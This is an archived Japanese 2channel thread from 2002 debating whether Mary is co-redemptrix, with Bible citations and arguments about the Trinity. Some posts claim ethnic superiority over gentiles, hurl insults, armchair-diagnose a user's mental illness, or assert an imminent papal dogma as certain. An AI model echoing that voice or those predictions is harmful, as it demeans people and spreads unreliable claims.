5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

■マリヤが共同贖罪者など異端の教義■

1 :名無しさん@1周年:02/12/04 20:33
カトリックは間もなくマリヤを共同贖罪者と宣言するそうだ。
それは異端の教義である。
唯一の贖い主はイエス・キリストである。

2 :名無しさん@1周年:02/12/04 20:44
俺さん、ウザイです。

3 :名無しさん@1周年:02/12/04 20:46
>>1
シメオンはマリアに言いました。
ルカ 2:35 ――あなた自身も剣で心を刺し貫かれます――多くの人の心にある思いがあらわにされるためです。」
苦しみを共にされたマリアは神の相続人になられたのです。
ローマ 8:17 もし子供であれば、相続人でもあります。神の相続人、しかもキリストと共同の相続人です。キリストと共に苦しむなら、共にその栄光をも受けるからです。

4 :名無しさん@1周年:02/12/04 20:47
3は異端者

5 :名無しさん@1周年:02/12/04 20:51
>>1
聖使徒パウロにできて、聖母マリアに出来ない筈がありません。
コロサイ 1:24 今やわたしは、あなたがたのために苦しむことを喜びとし、キリストの体である教会のために、キリストの苦しみの欠けたところを身をもって満たしています。


6 :名無しさん@1周年:02/12/04 20:52
>>4
ルカとパウロは異端者ですか?

7 :名無したん ◆jbl6actWF. :02/12/04 20:53
>>1
共贖者の宣言は既に為されていると思われ。違ったかな?(゚д゚)?

8 :名無しさん@1周年:02/12/04 20:57
ということで、>>1は聖書に反する異端者で決定。

9 :名無しさん@1周年:02/12/04 20:59
>>1俺さん、ウザイよ

10 :名無しさん@1周年:02/12/04 21:01
>>1
福音記者ルカと聖使徒パウロを破門できるものならしてみろ。

11 :名無しさん@1周年:02/12/04 21:02
>>1
シメオンはマリアに言いました。
ルカ 2:35 ――あなた自身も剣で心を刺し貫かれます――多くの人の心にある思いがあらわにされるためです。」

苦しみを共にされたマリアは神の相続人になられたのです。
ローマ 8:17 もし子供であれば、相続人でもあります。神の相続人、しかもキリストと共同の相続人です。キリストと共に苦しむなら、共にその栄光をも受けるからです。

聖使徒パウロにできて、聖母マリアに出来ない筈がありません。
コロサイ 1:24 今やわたしは、あなたがたのために苦しむことを喜びとし、キリストの体である教会のために、キリストの苦しみの欠けたところを身をもって満たしています。

福音記者ルカと聖使徒パウロを破門できるものならしてみろ。

12 :名無しさん@1周年:02/12/04 21:03
使徒はマリヤを共同贖罪者なんて言ってねえよ。

13 :名無しさん@1周年:02/12/04 21:04
>>12
使徒は神を三位一体なんて言ってねえよ。

14 :名無しさん@1周年:02/12/04 21:06
父なる神は神であり
御子も神であり
聖霊も神である
しかも、神は唯一である。

それを三位一体と言う。

15 :名無しさん@1周年:02/12/04 21:08
>>13
四位一体とでも言う気か?
父母と子と聖霊なんて言ったら異端だぞ!

16 :名無しさん@1周年:02/12/04 21:09
>>14
マリアご自身も剣で心を刺し貫かれました。
マリアはキリストと共に苦しみ、共にその栄光をも受けられました。
マリアは、キリストの体である教会のために、
キリストの苦しみの欠けたところを身をもって満たしています。

これをマリアの共同贖罪と言う。

17 :名無しさん@1周年:02/12/04 21:11
>>15
>四位一体とでも言う気か?
>父母と子と聖霊なんて言ったら異端だぞ!
マリアに神性はありません。ですから三位一体です。

18 :名無しさん@1周年:02/12/04 21:12
>キリストの苦しみの欠けたところ

キリストに欠けたところはありません。

そのような発想は異端です。

19 :名無しさん@1周年:02/12/04 21:12
>>13
「神は霊」であると、イエスはヨハネ福音書でいわれている。
父なる神と聖霊はひとつである。
「私は父と一つである」とキリストは福音書でいわれている。
キリストとおん父はひとつである。

父なる神と聖霊と子なるキリストはひとつである。
これが三位一体である。
以上。

20 :名無しさん@1周年:02/12/04 21:12
>>17
では共同贖罪者ではありません。

21 :名無しさん@1周年:02/12/04 21:14
>>19
ではマリヤは共同贖罪者ではない。

22 :名無しさん@1周年:02/12/04 21:14

age



23 :名無しさん@1周年:02/12/04 21:15
今ごろ必死で詭弁考えてんだろうなあ。カトが。

24 :名無しさん@1周年:02/12/04 21:17
>>19
神なる霊が複数いたり、捕らわれたりするんですか?
1ペテロ 3:19 そして、霊においてキリストは、捕らわれていた霊たちのところへ行って宣教されました。


25 :名無しさん@1周年:02/12/04 21:19
俺さん、ウザイよ。>>23

26 :名無しさん@1周年:02/12/04 21:20
>>24
エホ証か?

27 :名無しさん@1周年:02/12/04 21:20
>>20
>では共同贖罪者ではありません。
キリストは人性において贖われたのです。
何故なら、キリストは人性において死んだのですから。

>>21
>ではマリヤは共同贖罪者ではない。
キリストの人性と共に、マリアは贖いを共にしたのです。

28 :名無しさん@1周年:02/12/04 21:21
>>25
うざいと思うならメジュスレでも行け!

29 :名無しさん@1周年:02/12/04 21:22
>>27
>マリアは贖いを共にしたのです
などと聖書にはない

30 :名無しさん@1周年:02/12/04 21:26
>>26
あなたは伝承に全く頼らず、聖書のみから聖霊の神性を示すべきです。
霊の πνευματος に του という冠詞が付くと聖霊を意味するという根拠を、
伝承に頼らず聖書のみから示してください。

31 :名無しさん@1周年:02/12/04 21:27
>>29
シメオンはマリアに言いました。
ルカ 2:35 ――あなた自身も剣で心を刺し貫かれます――多くの人の心にある思いがあらわにされるためです。」

苦しみを共にされたマリアは神の相続人になられたのです。
ローマ 8:17 もし子供であれば、相続人でもあります。神の相続人、しかもキリストと共同の相続人です。キリストと共に苦しむなら、共にその栄光をも受けるからです。

聖使徒パウロにできて、聖母マリアに出来ない筈がありません。
コロサイ 1:24 今やわたしは、あなたがたのために苦しむことを喜びとし、キリストの体である教会のために、キリストの苦しみの欠けたところを身をもって満たしています。

32 :名無しさん@1周年:02/12/04 21:29
>>30
かってにすれば?
あんたが異端的教義を支持したけりゃすれば?

33 :名無しさん@1周年:02/12/04 21:30
マリアご自身も剣で心を刺し貫かれました。
マリアはキリストと共に苦しみ、共にその栄光をも受けられました。
マリアは、キリストの体である教会のために、
キリストの苦しみの欠けたところを身をもって満たしています。

これをマリアの共同贖罪と言う。

34 :名無しさん@1周年:02/12/04 21:31
>>31
マリヤは、あなたの罪を贖えません。
ただの専業主婦です。

35 :名無しさん@1周年:02/12/04 21:31
>>32
聖霊の神性を伝承に頼らず聖書のみから示せと言ってるだけじゃん。

36 :名無しさん@1周年:02/12/04 21:32
>>33
栄光は神にのみあるべきです。

キリストに欠けたところはありません。

37 :名無しさん@1周年:02/12/04 21:32
>>34
キリストも、人性においてはただの大工の子ナザレのイエスだよ。

38 :名無しさん@1周年:02/12/04 21:33
>>36
ローマ 8:17 もし子供であれば、相続人でもあります。神の相続人、しかもキリストと共同の相続人です。キリストと共に苦しむなら、共にその栄光をも受けるからです。
それなら、↑は間違いなんですね。

39 :名無しさん@1周年:02/12/04 21:37
俺さんの負け。

40 :名無しさん@1周年:02/12/04 21:37
>>38
気は確かですか?
それでマリヤが共同贖罪者になりますか?

41 :名無しさん@1周年:02/12/04 21:38
>>35
Uコリント3の17

42 :名無しさん@1周年:02/12/04 21:39
>>40
一般の信徒に出来ることをマリアが出来ないことないでしょ。
また、直接的根拠はここです。
ルカ 2:35 ――あなた自身も剣で心を刺し貫かれます――多くの人の心にある思いがあらわにされるためです。」


43 :名無しさん@1周年:02/12/04 21:40
>>38
共同の相続人とはあるが
共同贖罪者とはない。

気が狂ったのですか?

44 :名無しさん@1周年:02/12/04 21:42
>>42
一般信徒も共同贖罪者ではないし、マリヤも共同贖罪者ではない。

45 :共贖罪の聖母:02/12/04 21:42
聖母の御心はイエスのみ心と一つであられる。人としての聖母は神として
のイエスと心において一つになっている。それは私たち人間がイエスのみ
心と一つになる入口である。

聖母の脇腹から赤子が取り出されたように、アダムの脇腹からエヴァが取り
出されたように、聖母はイエスと心においても体においても1つであられた。
イエスの苦しみは聖母の苦しみとなった。

「あなたの心を剣が刺し貫く。それによって多くの人の思いが明らかにされる」
(ルカ2:35)

聖母の御心がイエスのあがないを共にすることが、私たちの心の目をキリスト
のあがないに開かせる。

46 :共贖罪の聖母:02/12/04 21:43
聖母は人間としての贖罪の見本である。聖母は人でありながら、神の苦しみ
を共にされた。私たちは、人として、隣人の苦しみをともにできる。わが子
の苦しみに胸を引き裂かれない母がいるだろうか。聖母がその子供たちであ
る私たちのために心引き裂かれる思いで祈っているのを知れば、私たちはど
うして、兄弟姉妹のために祈れずにおれようか。

そのように、聖母は教会に連なる共同贖罪の母である。大聖テレジアを見よ。
セラフィムの槍を受けて、聖人の心臓は切り裂かれ、兄弟姉妹、教会のため
に苦しみを負う犠牲の霊魂に召された。セラフィムの槍は、キリストの脇腹
を突き刺してあがないの血を注ぎ出した聖ロンギヌスの槍の再現である。

キリストの贖いが天にて続けられているように、地においても、人として贖
いの務めに召される人々がいる。マリアは天における諸聖人の筆頭であり、
地上の聖人はその写しであり、あなた方が共にすべき小さきあがないの見
本である。

47 :共贖罪の聖母:02/12/04 21:43
パードレ・ピオもそのつとめに召された。このような、キリストの十字架を
その体において経験し、今なお天にてキリストの贖罪が継続されていること
を身をもって証言する聖人が、常に教会を影で支えてきたことを知れ。その
存在を見本として、あなた方もまた小さきあがないができるためである。

マリアは世の終わりに至るまであがないの働きを共にされている。キリスト
の心の人における半分として、その御心は聖カテリーナ・ラブレーに啓示さ
れ、メダイに刻まれた。その心臓に刺さった剣から流れ出す血は、世の罪を
御身に受けて苦しむ犠牲の霊魂の注ぎ出す清い御心の御血である。

血は霊である。聖なる血は汚れた血を清める。切り裂かれたキリストの心臓
から流れる主の御血は、それに連なる聖母の切り裂かれたみ心を伝って世に
聖霊となって流れ下る。それで、聖霊に満たされた人は、聖母を通してキリ
ストのみ心に一つになっている。

48 :共贖罪の聖母:02/12/04 21:43
聖母の共同贖罪の意味はここにある。あなた方は聖母を通して、まことに
キリストの神秘体に属するのである。

聖母なくして、どうしてキリストが世に与えられたであろうか。聖母は世の
始まる前より神によって選ばれていた。同じように、霊の永遠性において、
聖母はいつまでも、キリストご自身を世にお与えになる御者にあらせられる。

プロテスタントは母を知らぬ子のようである。だが、子は知らなくとも、母
は子を知っている。子が母を知ればどんなによいことか。子は泣いて母に走
り寄る。子の心の渇きは満たされる。御母は聖霊の浄配であられるので、
聖霊をいただく人は必ずや聖母の恵みに浴している。実に、聖母は、聖霊が
世に流される道であられる。世に向けていのちの川を流す道であられる。

49 :名無しさん@1周年:02/12/04 21:44
>>42
マリヤには人の罪の全て、又は、一部を贖うことは出来ない。

50 :名無しさん@1周年:02/12/04 21:46
>>46-48
マリヤが共同贖罪者などと何処に書いてあるんだよ?

51 :名無しさん@1周年:02/12/04 21:48
(ルカ2:35)にマリヤが共同贖罪者と書いてあるのか?

52 :共贖罪の聖母:02/12/04 21:49
あなた方が聖霊をいただくには、聖母と心を一つにするのがもっとも近い。
それには、聖母を真実たたえられるために、聖霊の実を宿すよう、
聖母にならう生き方をする。崇敬はその生き方の自然な発露である。

ガブリエルは言った。「…神に不可能なことはないのです」マリアは答えて
いった。「はい。おことばどおりになりますように」(ルカ1:37、38)

FIATは永遠にキリスト者の第一歩である。

53 :共贖罪の聖母:02/12/04 21:51
天使祝詞

めでたし聖寵 満ち満てるマリア
主御身とともにまします(ルカ1:26-28。大天使ガブリエルは
乙女マリアに遣わされて告げる)

御身は女のうちにて祝せられ
御胎内の御子イエズスも祝せられたもう(ルカ1:41-43。聖霊に包まれた
エリサベトはマリアの挨拶に応えて声高らかに叫ぶ)

天主の御母 聖マリア
罪人なるわれらのために
いまも臨終のときも祈り給え アーメン 
(選ばれた方、マリアに謙虚に取り次ぎを願う)

54 :名無しさん@1周年:02/12/04 21:52
>>41
2COR 3:17 ο δε κυριος το πνευμα εστιν ου δε το πνευμα κυριου εκει ελευθερια
του の冠詞が付けばただの「1ペテロ 3:19」のうような霊ではなく、
聖霊であるという根拠は。

55 :名無しさん@1周年:02/12/04 21:56
あのぅ・・・
ロンギヌスは聖人では有りませんが・・・

56 :名無しさん@1周年:02/12/04 22:00
>>43
>共同の相続人とはあるが
>共同贖罪者とはない。
「キリストと共に苦しむなら」という、共同の相続人である為の条件がローマ 8:17 で示されているじゃない。

57 :>>1=俺さんの履歴:02/12/04 22:01
<俺さんの履歴。以前のスレッドを知らない人のために>
俺さんは鬼塚の本をよみました。御利益信仰が身についていた彼は、
早速、呪文代わりにロザリオをあげて、御利益を求めました。
すると、夜に金縛りに合いました。
この事件をもって、かれはマリアを悪霊と結論付けました。それから、ペン
テコステ系の牧師を渡り歩き、牧師からマリアは悪霊イシスである
と言われたことで、自分の結論が決定的になりました。
鬼塚、御利益信仰、滅茶苦茶な素人信心、金縛り。これらの自分の過ちを
自分に求めることをしないで、かれはマリアにすべての罪を着せて、
心の平安を装っているのです。それを正統化するために、2chを使い、
マリア攻撃スレをたて、半端なプロの知識でカトを攻撃し始めました。
彼は多重人格障害を負っています。以前、マリスレと平行して、多重人格
障害のスレッドを立てていました。それが彼であることがばれてから、
急にスレッドを上げなくなり、埋没させました。彼は心の病を負っている
のです。彼の氏名が分かれば祈るのですが、この通り、親切な助言に
食って掛かる始末です。本当に手を焼いています。
彼を救うために名案がある人は書き込んで下さい。

58 :名無しさん@1周年:02/12/04 22:03
>>44
>一般信徒も共同贖罪者ではないし、
そうかもしれませんね。キリストの苦しみの欠けたところを身をもって満たすことができるのは、
信徒でも限られていると思います。
コロサイ 1:24 今やわたしは、あなたがたのために苦しむことを喜びとし、キリストの体である教会のために、キリストの苦しみの欠けたところを身をもって満たしています。
>マリヤも共同贖罪者ではない。
聖使徒パウロができて、聖母マリアが出来ないはずがありません。

59 :名無しさん@1周年:02/12/04 22:07
>>49
>マリヤには人の罪の全て、又は、一部を贖うことは出来ない。
聖使徒パウロができて、マリアに出来ないはずがない。

>>50
>マリヤが共同贖罪者などと何処に書いてあるんだよ?
三位一体などと何処に書いてあるんだよ?


>>51
>(ルカ2:35)にマリヤが共同贖罪者と書いてあるのか?
(Uコリント3の17)に三位一体って書いてあるのか?

60 :名無しさん@1周年:02/12/04 22:11
>>41
2COR 3:17 ο δε κυριος το πνευμα εστιν ου δε το πνευμα κυριου εκει ελευθερια
του の冠詞が付けばただの「1ペテロ 3:19」のうような霊ではなく、
聖霊であるという根拠は。 κυριοςは主と訳されていますが、
ヘブライ語のアドナイではなくヤハウェに対応する主とは限りませんね。
もし限るというなら、ルカ 1:43 の「主の母」を「神の母」と認めなさい。



61 :名無しさん@1周年:02/12/04 22:19
俺さんの負け。

62 :名無しさん@1周年:02/12/05 16:29
>>18
>>キリストの苦しみの欠けたところ

>キリストに欠けたところはありません。
キリスト自体に欠けたところがあると言っているのではなく、
キリストの苦しみの欠けたところがあると言っているのです。

>そのような発想は異端です。
あなたこそ、聖書に反する異端です。
コロサイ 1:24 今やわたしは、あなたがたのために苦しむことを喜びとし、キリストの体である教会のために、キリストの苦しみの欠けたところを身をもって満たしています

63 :名無しさん@1周年:02/12/05 16:32
>>18
新改訳でも「キリストの苦しみの欠けたところ」と訳しています。
col: 1:24
ですから、私は、あなたがたのために受ける苦しみを喜びとしています。そして、キリストのからだのために、私の身をもって、キリストの苦しみの欠けたところを満たしているのです。キリストのからだとは、教会のことです。

64 :名無しさん@1周年:02/12/05 16:37
マリアにはイエスのような贖罪は出来ない。
マリアはただの人だから。
マリアはイエスを産むために創られたことは明らかである。
マリアの助け無しにイエスはこの地上には降りなかった。

マリアの共同贖罪説の概念はこういう仮説から出ている。
マリアの無原罪説も同じ仮説から出てきているのさ。
マリアなくしてイエスは地上に降りてこなかった。ということさ。
それゆえに、共同贖罪者とさいう仮説が議論されているわけさ。

「俺」は聖書が絶対正しいとかアホな事を言ってるが、
聖書にはたくさんの矛盾があることも知らないようだ。
キリスト教徒は勝手にこじつけて矛盾はないなどと抜かすが、
我々にとってはそういった駄言を聞く度におかしくて笑いそうになる。

聖書は常に周囲の民族・宗教を意識して描かれているのさ。
それらの民族・宗教より常に上位でなければならない。
他にあるもので使えそうなものは何でも飲み込むし、
都合が悪くなったら禁じたりもするし、別のものに変化させもする。

キリスト教の歴史もそうだった。
でも宗教改革者を名乗る連中が聖書を神のように礼拝し始めたのさ。
そして我々が外に対してやってることの真似事をおっぱじめた。
馬鹿だなぁ・・・ってみんなで見てたんだよ。

福音派の国アメリカでは、プロが我々に媚びてあがる。
所詮は成り上がり者。権威が欲しいんだろうなってみんなで笑って見てるよ。
カトやオーソも最近は媚びてきだしあがった。ほんと、おかしいね。ワラ

65 :名無しさん@1周年:02/12/05 16:49
>>27
>>では共同贖罪者ではありません。
>キリストは人性において贖われたのです。
>何故なら、キリストは人性において死んだのですから。
うんじゃ、キリストの人性が黄泉降りしているあいだ、神性はどこで何をしてたんだ?



66 :名無しさん@1周年:02/12/05 16:51
スレ違いではありますが、どなたでもかまいません、お答えください。>>19に、
「わたしと父とは一つ」との引用があります。
だからイエスは父だと。

今個人的に読んでいる旧約聖書の小預言書、例えばゼカリヤ2.8や11.12、13に書いてあることを>>19の言い分にあてはめると、

エルサレム(シオン山)の娘たち=神の目玉、
預言者ゼカリヤ=神

とかいうことになるんですが、そうじゃないですよね。

「わたしと父とはひとつ」というのも、やはり比喩なんじゃないですか?
つまり、イエス=御父というのは根拠が薄弱すぎじゃありませんか?

67 :名無しさん@1周年:02/12/05 16:54
>>64
>マリアにはイエスのような贖罪は出来ない。
そうですね。
共贖罪とはいえ、マリアの仲介とキリストの仲介が区別されるのと同様、
マリアの贖罪とキリストの贖罪とは区別されるはずです。

68 :名無しさん@1周年:02/12/05 16:54

>>64

証拠は?
リンクなしで匿名で言っても駄目だ。
いちいちリンクして物を言え。


69 :名無しさん@1周年:02/12/05 17:04
>>66 名前:名無しさん@1周年 :02/12/05 16:51
>スレ違いではありますが、どなたでもかまいません、お答えください。>>19に、
>「わたしと父とは一つ」との引用があります。
>だからイエスは父だと。
その聖句からイエスは父であるという考えるのは、父難説という異端になります。
正確には、天の御父と御言葉なるキリストが、神性において同本質と考えるべきです。
恐らく>>19が言っているキリストの神性を示す明示的箇所は、
ヨハネ福  1:1 初めに言があった。言は神と共にあった。言は神であった。
ヨハネ福  1:14 言は肉となって、わたしたちの間に宿られた。わたしたちはその栄光を見た。それは父の独り子としての栄光であって、恵みと真理とに満ちていた。
だと思います。これはカトリックの古いラテン典礼の最後の方で唱えられていました。
私は、キリストの神性を伝承に頼らず聖書のみから示すのは比較的簡単だとは思いますが、
聖霊の神性は伝承に頼る必要があると考えています。

70 :名無しさん@1周年:02/12/05 17:05
>>64
煉獄ジジイ脳みそ腐乱うざい!
結論はなんだ?アホ!

71 :名無しさん@1周年:02/12/05 17:08
>>68証拠は君達が聖書といっている書物に全てあるよ。
君達が故意に無視するだけさ。
リンクを付けなければならない程度の証拠は私は提供しない。
異邦人って我々より下等だな。
種明かししてやっても否定するのに必死だよ。ワラ

72 :名無しさん@1周年:02/12/05 17:11
>>71
脳みそ腐って死ね!藁

73 :名無しさん@1周年:02/12/05 17:13
>>65
>>>では共同贖罪者ではありません。
>>キリストは人性において贖われたのです。
>>何故なら、キリストは人性において死んだのですから。
>うんじゃ、キリストの人性が黄泉降りしているあいだ、神性はどこで何をしてたんだ?
陰府に下る魂には、その位格に対して人性と神性が成立っています。
また地上に残っている肉体に、位格に対して人性と神性が成立っています。
死んだ、即ち肉体と魂が分離したという事象は、キリストの位格の人性です。
陰府の人びとを救済したのはキリストの神性ですが、
贖うという行為は神に対してすることなので、人性でなければいけません。

74 :名無しさん@1周年:02/12/05 17:13
>>70都合が悪くなると人をカトにしてしまうんだね。ワラ
ユダヤ人になれないから悔しのだね。

君達は生まれつき下等な人種なんだから、
おとなしく人の話を聞いていればいいのさ。

75 :名無しさん@1周年:02/12/05 17:19
>>74
おまえの話には結論がねえんだ!あほう

76 :名無しさん@1周年:02/12/05 17:19
>>72君は異邦人だ。君の脳が腐っているのは当然なのさ。
君の脳が腐っているからといって、
優秀な民族の脳が腐っているという定義は成り立たないものだよ。

77 :名無しさん@1周年:02/12/05 17:20
>>75結論を受け入れたくない。君はただそれだけさ。
なぜなら脳が腐乱しているからね。

78 :66:02/12/05 17:22
>>69 なるほど。イザヤ9.6 後には51.9、10 52.10もキリストの神性について言及しているように個人的には感じます。それを受けての言及ではありませんかね?ヨハネは。

霊について、ゼカリヤ3.1〜11はヨハネ黙示録1.4 3.1 3.5 5.6と同じ、神の七つの霊に言及してるようですが。

79 :名無しさん@1周年:02/12/05 17:23
>>76-77
恥知らず!腐った脳みそで少しは考えろ!
とは言うものの無理だろうな。

従って、オマエは死ぬまで偶像礼拝。

80 :66:02/12/05 17:25
おっと、ゼカリヤ3.1〜4.14です!

81 :名無しさん@1周年:02/12/05 17:25
>>79

俺さん、ウザイよ

82 :名無しさん@1周年:02/12/05 17:27
>>79
79は俺さんとは限らない。
仮に俺さんとしても、どのようにウザイのか?

83 :名無しさん@1周年:02/12/05 17:36
>>79君達は聖書を偶像崇拝の道具に使い、
異邦人の癖に我々の神を知ったかぶりをしているじゃないか。
我々の常識ではキリスト教徒=ナザレのイエスを神とする
偶像崇拝の徒なんだよ。

84 :名無しさん@1周年:02/12/05 17:38
>>82君は脳が腐乱しているから自分のことも分からないのさ。

85 :名無しさん@1周年:02/12/05 17:39
>>83
笑わすな!
偶像を偶像礼拝の道具にするのは良いのか?

86 :名無しさん@1周年:02/12/05 17:40
>>84
脳みそ腐乱して馬鹿になりましたねえ。
だんだん馬鹿になっていますねえ。

87 :名無したん ◆jbl6actWF. :02/12/05 17:45
>>82
ウザイというより、むしろ、主の御言葉に反する言動が腹ただしい訳だろう。
兄弟に馬鹿というものは最高法院に引渡される、要するに逝って良し。
バカどころか、脳みそ腐乱とまでいう彼が、まともなキリスト者であろうか。
漏れも人のことは言えんか・・・

88 :名無しさん@1周年:02/12/05 17:46
>>85キリスト教=偶像崇拝の徒=偶像を使って普通。
でも、カトもオーソも偶像は使っていない。
しかし、プロは聖書自身を偶像化したんだな。

>>86君がね。君は自分がそうだから他人もそうに違いないという
一種の確信があるが、それは間違っているのさ。
早く精神病院へいけよ。

89 :名無しさん@1周年:02/12/05 17:49
>>85聖人は偶像じゃねーだろ。偶像は人間の作。聖人は神の作。

90 :名無しさん@1周年:02/12/05 17:50
>>78
「七つの霊」は、七十人訳聖書イザヤ11:2で言及されていることが知られています。 "επ' αυτον πνευμα" がそれです。
Isaiah 11:2 και αναπαυσεται επ' αυτον πνευμα του θεου
πνευμα σοφιας και συνεσεως πνευμα βουλης και ισχυος
πνευμα γνωσεως και ευσεβειας

91 :名無しさん@1周年:02/12/05 17:50
ということで、プロテスタントはユダヤ人から見れば
カトやオーソより偶像崇拝を熱心にやってる害基地の徒。
神を汚す行為をやっている連中。
しかし、ユダヤ人に対して隷属に近い服従をしたがる。
「使うだけ使ってやろう」こっちはそう考えているのさ。

そんな神様ごっこのお遊戯から卒業したければ、
聖書を偶像のように扱わないことだ。ワラ

92 :名無しさん@1周年:02/12/05 17:51
>>85
私たちカトリックは一切しません。

93 :名無しさん@1周年:02/12/05 17:53
>>78
イザヤ書は岩波文庫の関根訳を入手されてはいかがでしょうか。
キリスト教の文脈を離してよめば、これはたんに「救世主」メシアについて
述べているのであって、それが神であるという解釈を導くのは難しいと思います。

94 :名無しさん@1周年:02/12/05 17:53
>>85
素直に聖母を信じなさい。あなたの聖書にも、クリスチャンのことを
「聖徒」と訳しているではありませんか。マリア様は最初のクリスチャン、
「聖徒」です。つまり聖なる母です。ということは聖母。
聖人を敬うのは当然。地上の聖人でも合えば敬いますよ。
師を敬え、父母を敬えというでしょう。
なぜ、当たり前のことができない? 聖母はまさしく信仰の師です。

95 :名無しさん@1周年:02/12/05 17:55
>>94目に見えないから。

96 :名無しさん@1周年:02/12/05 17:56
>>89もっともだ。さすがはユダヤ人が作り上げた宗教だけはある。
ただし、ユダヤ人には及ばないな。まだまだ・・・。

97 :名無しさん@1周年:02/12/05 17:58
>>94
初代教皇をマリアが務めたのであれば、あなたの言うことも正しいかもしれないが..

98 :名無しさん@1周年:02/12/05 17:59
>>96

ユダや人はキリストには及びません。
しかし、キリストが贖罪を遂げるのに、彼らを用いたこともまた事実。

99 :名無しさん@1周年:02/12/05 18:02
>>97マリアは理想とされた母親像であるために、
あまりものを言うように描写されていないようだ。
ものを言う女は昔は嫌われたのさ。

初代教皇をマリアが努めたのなら・・・とかいう、
プロの現代的な発想は訳が分からないな。

100 :名無しさん@1周年:02/12/05 18:02
>>94
こじ付けです。

柳の枝に猫が居たら
猫柳ですか?

101 :名無しさん@1周年:02/12/05 18:05
>>98君達の主張は変だ。人間が神であると君達は言っている。

102 :名無しさん@1周年:02/12/05 18:07
>>100そういうこじつけ程度なら、我々はもっとやってきたが?
そのこじつけの羅列が聖書なんだが・・・。

103 :名無しさん@1周年:02/12/05 18:09
司教や教皇にならなくても、立派な人はたくさんいる。
ビオ神父は立派じゃないか。
女性は叙階できなくても立派な人はそれなりに立派なんです。

104 :名無しさん@1周年:02/12/05 18:12
最初の列聖は、殉教者に対してだった。
組織を維持するために、聖人という称号を与えて生き残りを図ったのさ。

ユダヤ人たちは、自分達に向くはずの迫害を
キリスト教徒に向けるように扇動したのさ。
ユダヤ人って頭いいよ。

105 :名無しさん@1周年:02/12/05 18:15
>>102
なるほど、聖書よりも迷信が好きなんですか?
威って良し。

106 :66:02/12/05 18:15
>>90 そうなんですか。知りませんでした。

>>93 関根正雄訳ですか・・。 

107 :名無しさん@1周年:02/12/05 18:15
>>100
猫柳をそう定義すればね。
杉は、林と言い畑とは言わない。
しかしリンゴは木なのに林とは言わずに畑と言う。
何故と言われても定義なんだから仕方がない。
馬は引くもの、牛は追うもの。
将棋は指すもの、囲碁は打つもの。
童貞は捨てるもの、処女は奉げるもの。
何れも定義だから仕方がない。

108 :名無しさん@1周年:02/12/05 18:20
>>107
それでヒイラギの上にマリヤが出没したら何だ?

109 :名無しさん@1周年:02/12/05 18:24
>>105聖書より迷信が好き?意味が通らんよ。
聖書はイスラエルがいかにして他の民より優れているか、
イスラエルの主は他の神々よりいかに優れているかと
いろいろと書いているものさ。

迷信は君たちが作り出したそういった特異な発想さ。
迷信を奉じる異邦人の偶像崇拝の徒は君たちさ。

110 :名無しさん@1周年:02/12/05 18:26
>>108
あなたの好きなように定義すればいい。
その定義を誰と共有するかは別だが。

111 :名無しさん@1周年:02/12/05 18:26
>>108阿呆は人に聞くことしかできないとはいうけど、
本当に阿呆だな。偶像崇拝の徒らしくてグッドだよ。

112 :名無したん ◆jbl6actWF. :02/12/05 21:26
>>93
岩波文庫のイザヤ書は手に入らないですよ。
いま在庫があるのは、創世記、出エジプト記、ヨブ記だけ。
どうしてもというなら、教文館版の全訳があるけど、読んだことがないのでシラヌシラヌ。

113 :66:02/12/05 22:33
>>93 御礼と共に改めて返事いたします。
イザヤ9.6 51.5、9、10 52.10 63.10〜14などで描写されている者が、単に「救世主」という意味だということですね。

キリストは神性をもつということと、矛盾しないと思います。

旧約のある部分では、[神々の集会の主催者なる主]について描かれています。
また、別の部分では非難されている女神にさえ、普通はヤハウェ(エホバ)にのみ用いられる「エローヒーム」が使われもします。

天使について、強大な力を持つ神々として表現する事が出来るなら、まして「神の御腕」たる方、神の七つの霊を有する方なら。

114 :名無しさん@1周年:02/12/05 23:21
教皇様は、聖母の無原罪懐胎教理制定150周年の2004年に、マリア共贖
宣言をなさりたいご意向です。10月29日、教皇庁アカデミー第7会議で、
「2004年に向け、聖母について豊富な神学研究とさらなる調査をせよ」
と言われました。
http://www.zenit.org/english/visualizza.phtml?sid=27072
メジュゴリエが認められるのは時間の問題です。教皇様は、メジュゴリエ
を非常に大切になさっておられます。実に、メジュゴリエがこれほど世界
的な運動になったのも、教皇様の支援なしには達し得なかったこと。オラ
ンダの啓示ではファチマで聖母が約束された「平和の時代」の到来条件が、
「教皇様が聖母共贖者の最終教理を使徒座から宣言する」、すなわち、
公的にカトリックのドグマに採用するときに始まると言っています。
メジュゴリエはファチマの継続にして実現。オランダもそうなります。

115 :名無しさん@1周年:02/12/05 23:22
反対派は、平和を求めるなら、すべての民の御母を信じなさい。あなたの母です。

116 :素人:02/12/05 23:25
最初の女 イブ ですね

117 :名無しさん@1周年:02/12/06 11:46
いぜべる

118 :名無しさん@1周年:02/12/06 13:06
>>1

カトリックの自殺行為だな。
時代遅れだよ、こんなの。
信ずるのは勝手だが、まやかし
はまやかしだ。

119 :マリアの8つの教義:02/12/06 13:13
教皇様は、聖母の無原罪懐胎教理制定150周年の2004年に、マリア
共贖宣言をなさりたいご意向です。10月29日、教皇庁アカデミー
第7会議で、「2004年に向け、聖母についての豊富な神学研究と
さらなる調査をするよう」言われました。
http://www.zenit.org/english/visualizza.phtml?sid=27072

メジュゴリエが認められるのは時間の問題です。教皇様は、
メジュゴリエを非常に大切になさっておられます。実に、メジュゴリエが
これほど世界的な運動になったのも、教皇様の支援なしには
達し得なかったことなのです。

オランダの啓示ではファチマで聖母が約束された「平和の時代」の
到来が、「教皇様が聖母共贖者の最終教理を使徒座から宣言する」、
すなわち、公的にカトリックのドグマに採用するときに始まると預言
されています。メジュゴリエはファチマの継続にして実現。
オランダはその橋渡しです。

120 :マリアの8つの教義:02/12/06 13:14
なお、これがカトリックのドグマとして正式に採用されることになれば、
これまでの5つに続き、3つが不滅の教義として定められることに
なります。なぜでしょう?

教皇、ヨハネ・パウロ二世が世界をマリアの汚れなき御心に奉献なさり、
世界がすべての民の御母のものであることを、教皇様と共なる司教全員
が受け入れたからです。受け入れたからには、この通りに進みます。
この動きは変えられません。

マリアは、カトリック、非カトリックを問わず、全世界から民を集め、
キリストに招きます。これに逆らうも、従うも自由意志に任されます。
悪意をもって逆らう人はサタン(゛逆らう者”)にそそのかされて
います。その一味にならないように注意してください。

121 :マリアの8つの教義:02/12/06 13:14
カトリックで不滅の教義に定められている聖母マリアの5ドグマ
 1、テオトコス(神の母)341年
 2、終生童貞649年
 3、無原罪懐胎1854年
 4、被昇天 1950年
